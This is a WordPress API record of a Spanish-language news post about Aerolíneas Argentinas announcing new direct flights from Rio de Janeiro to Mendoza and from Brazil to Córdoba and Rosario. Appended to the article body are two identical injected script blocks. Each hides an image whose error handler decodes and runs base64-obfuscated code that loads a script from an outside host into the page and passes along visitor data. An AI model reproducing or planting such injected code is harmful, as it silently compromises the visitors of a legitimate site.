{"id":1541,"date":"2022-09-23T18:06:07","date_gmt":"2022-09-23T21:06:07","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1541"},"modified":"2025-08-14T00:34:35","modified_gmt":"2025-08-14T03:34:35","slug":"abav-2022-aerolineas-argentinas-anuncio-inedito-vuelo-directo-entre-rio-de-janeiro-y-mendoza","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1541","title":{"rendered":"ABAV 2022: Aerol\u00edneas Argentinas anuncio in\u00e9dito vuelo directo entre Rio de Janeiro y Mendoza"},"content":{"rendered":"\n<h4 class=\"has-text-color has-background wp-block-heading\" style=\"background-color:#08689f;color:#a0a5aa\"><em>As\u00ed lo confirm\u00f3 la compa\u00f1\u00eda en una de las ferias m\u00e1s grandes de Brasil. Adem\u00e1s, la aerol\u00ednea adelant\u00f3 que durante el verano conectar\u00e1 de manera directa la ciudad carioca con C\u00f3rdoba y tambi\u00e9n Florian\u00f3polis con Rosario y con la capital cordobesa.<\/em><\/h4>\n\n\n\n<p>La extrema calidad de sus&nbsp;<strong>vinos<\/strong>, sumada a una oferta que propone bodegas encantadoras, bienestar y un excelente clima, entre una larga lista de atributos, hacen de<strong>&nbsp;Mendoza&nbsp;<\/strong>un destino ideal para el turismo internacional. Por eso, la demanda es cada vez mayor y el mercado de Brasil, el principal del receptivo argentino, no se queda atr\u00e1s.<\/p>\n\n\n\n<p>Frente a estas grandes posibilidades que ofrecen las tierras mendocinas, en el marco del primer d\u00eda de la 49\u00aa edici\u00f3n de la feria&nbsp;<strong>ABAV<\/strong>, en la ciudad de Recife,&nbsp;<strong>Aerol\u00edneas Argentinas (AR) realiz\u00f3 un hist\u00f3rico anuncio: a partir del pr\u00f3ximo 3 de enero, con dos frecuencias semanales, conectar\u00e1 por primera vez de manera directa R\u00edo de Janeiro con Mendoza<\/strong>.<\/p>\n\n\n\n<p><strong>Fabi\u00e1n Lombardo, Director Comercial, Planeamiento y Gesti\u00f3n de Rutas de AR<\/strong>, cont\u00f3 que&nbsp;<em>\u00abBrasil es el principal mercado para el turismo receptivo de Argenitno. Por eso, as\u00ed como estuvimos este a\u00f1o en Curitiba, Brasilia y Porto Alegre presentando el regreso de los vuelos directos a Buenos Aires, ahora vinimos a Recife a potenciar nuestro v\u00ednculo con este nuevo vuelo directo de R\u00edo de Janeiro a Mendoza y a comunicarle a los brasile\u00f1os y brasile\u00f1as que la mejor experiencia en Argentina la pueden hacer volando con nosotros\u00bb<\/em>.<\/p>\n\n\n\n<p>Pero hubo m\u00e1s novedades de Aerol\u00edneas Argentinas en el primer d\u00eda de ABAV. A partir del 2 de enero,&nbsp;<strong>la capital carioca tambi\u00e9n se unir\u00e1 en forma directa con la Ciudad de C\u00f3rdoba<\/strong>&nbsp;con cuatro frecuencias semanales y&nbsp;<strong>Florian\u00f3polis har\u00e1 lo propio con Rosario<\/strong>, con dos vuelos por semana. En tanto, desde el balneario conocido como&nbsp;<em>Floripa<\/em>&nbsp;tambi\u00e9n se podr\u00e1 volar sin escalas a la capital cordobesa, con tres frecuencias semanales desde el 3 de enero del pr\u00f3ximo a\u00f1o.<\/p>\n\n\n\n<p>Al equipo presente de INPROTUR en la feria lo acompa\u00f1an\u00a0<strong>Aerol\u00edneas Argentinas, la secretar\u00eda de Estado de Turismo de Santa Cruz, el ministerio de Turismo y Deportes de Salta, la secretar\u00eda de Turismo de La Rioja, el Instituto Fueguino de Turismo (INFUETUR), Visit Buenos Aires, el ministerio de Cultura y Turismo de Jujuy, la secretar\u00eda de Turismo de la Municipalidad de Ushuaia, el ministerio de Turismo y Deporte de R\u00edo Negro, el ministerio de Cultura y Turismo de Mendoza, el Ente Mixto de Promoci\u00f3n Tur\u00edstica de Bariloche (EMPROTUR)\u00a0<\/strong>y las empresas\u00a0<strong>Madero Tango, Gray Line Argentina, Distintos Mendoza, Mansi\u00f3n Tango, La Ventana\/Gala Tango\/Aljibe\/Michelangelo, Wyndham Hotel, El Querand\u00ed Tango Show\/La Cava del Querand\u00ed, Altos Ushuaia, Grand Hotel Lux, Moebius Argentina Icoming DMC, Mendoza Holidays (Cellar Tastings), Arakur Ushuaia Resort &amp; Spa, Conextur, Estuario del Plata, Aymara Turismo, AMV Travel Argentina DMC, Hotel Madero Buenos Aires y Quality Travel<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/argentina.us10.list-manage.com\/track\/click?u=c72ee12e8482a64a249259cc5&amp;id=7cc44ab007&amp;e=1f1bd49e71\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/VisitArgentina_Isologotipo_B_Color_Azul-1-e1628519504367-1024x243.png\" alt=\"\" class=\"wp-image-1537\" width=\"501\" height=\"113\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>As\u00ed lo confirm\u00f3 la compa\u00f1\u00eda en una de las ferias m\u00e1s grandes de Brasil. Adem\u00e1s, la aerol\u00ednea adelant\u00f3 que durante el verano conectar\u00e1 de manera directa la ciudad carioca con C\u00f3rdoba y tambi\u00e9n Florian\u00f3polis con Rosario y con la capital cordobesa. La extrema calidad de sus&nbsp;vinos, sumada a una oferta que propone bodegas encantadoras, bienestar [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1542,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-1541","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-buses-y-aeropuertos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1541"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1541"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1541\/revisions"}],"predecessor-version":[{"id":7338,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1541\/revisions\/7338"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1542"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1541"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1541"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1541"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}